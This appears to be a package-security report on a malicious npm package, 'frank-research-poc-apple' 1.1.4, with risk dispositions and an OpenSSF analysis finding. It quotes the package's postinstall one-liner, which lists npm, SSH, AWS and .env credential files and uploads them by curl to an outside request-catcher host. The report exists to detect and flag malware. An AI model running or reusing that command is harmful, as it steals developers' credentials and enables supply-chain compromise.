All frank-research-poc-apple versions
frank-research-poc-apple @1.1.4
Maintainers
Risk Dispositions (3 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
install-script:postinstall |
install-scripts | reject | AI | AI (install-scripts): Postinstall exfiltrates npm credentials to an attacker-controlled server; malicious across all versions of this package. | |
bogus-package |
bogus-package | reject | AI | AI (bogus-package): All spam/bogus signals confirmed; package is a throwaway malware vehicle. | |
semgrep:child-process-import |
semgrep | reject | AI | AI (semgrep): child_process used in confirmed malware context; generalizes to this package. |
SAST Findings (3)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (7f21864e3fd8ae5f8a1fe5a450428e5cd85f5b8b9bbfccb98c1fc6000a283982) The OpenSSF Package Analysis project identified 'frank-research-poc-apple' @ 1.1.4 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
Script: echo 'Target: ' $(hostname) > info.txt && echo 'User: ' $(whoami) >> info.txt && echo '--- Kredensial Tersedia ---' >> info.txt && ls -la ~/.npmrc ~/.ssh ~/.aws .env 2>/dev/null >> info.txt && curl -X POST -F "[email protected]" https://franki.requestcatcher.com/test
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 84. Findings: 1 critical (+40), 1 high (+25), 1 medium (+10), 3 low (+9).
Published to npm: